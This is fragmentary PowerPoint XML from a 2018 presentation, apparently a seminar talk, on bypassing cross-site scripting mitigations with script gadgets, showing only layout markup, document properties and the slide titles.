          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6268179"/>
            <a:ext cx="12185810" cy="5844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300" dirty="0"/>
              <a:t>Burhan Otour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44E200-33E0-40FD-A95E-456CA35386E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11127766" y="56247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71124-2B44-49D7-80CF-AE323DD078A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612166" y="264510"/>
            <a:ext cx="10515600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Script Gadget?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7B49D-BF0B-4F2C-B354-2F7ADB2E0712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="612167" y="1168226"/>
            <a:ext cx="10975488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11363</TotalTime>
  <Words>1544</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>349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Calibri Light (Headings)</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Breaking Cross-Site Scripting Mitigations via Script Gadgets</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>XSS mitigations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Research Question</vt:lpstr>
      <vt:lpstr>Bypassing WAFs &amp; XSS filters</vt:lpstr>
      <vt:lpstr>Bypassing WAFs &amp; XSS filters</vt:lpstr>
      <vt:lpstr>Bypassing HTML sanitizers</vt:lpstr>
      <vt:lpstr>Bypassing HTML sanitizers</vt:lpstr>
      <vt:lpstr>Bypassing Content Security Policy</vt:lpstr>
      <vt:lpstr>Bypassing CSP unsafe-eval</vt:lpstr>
      <vt:lpstr>Bypassing CSP strict-dynamic</vt:lpstr>
      <vt:lpstr>Bypassing CSP</vt:lpstr>
      <vt:lpstr>Bypassing CSP</vt:lpstr>
      <vt:lpstr>Bypassing CSP</vt:lpstr>
      <vt:lpstr>Bypassing CSP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Research Question</vt:lpstr>
      <vt:lpstr>Finding Gadgets at Scale</vt:lpstr>
      <vt:lpstr>General Results</vt:lpstr>
      <vt:lpstr>HTML Sanitizers at Scale</vt:lpstr>
      <vt:lpstr>Content Security Policy at Scale</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outlook &amp; Conclusion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XSS mitigations via script gadgets</dc:title>
  <dc:creator>Burhan Otour</dc:creator>
  <cp:lastModifiedBy>Burhan Otour</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-11T12:29:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-03T11:07:54Z</dcterms:modified>
</cp:coreProperties>
</file>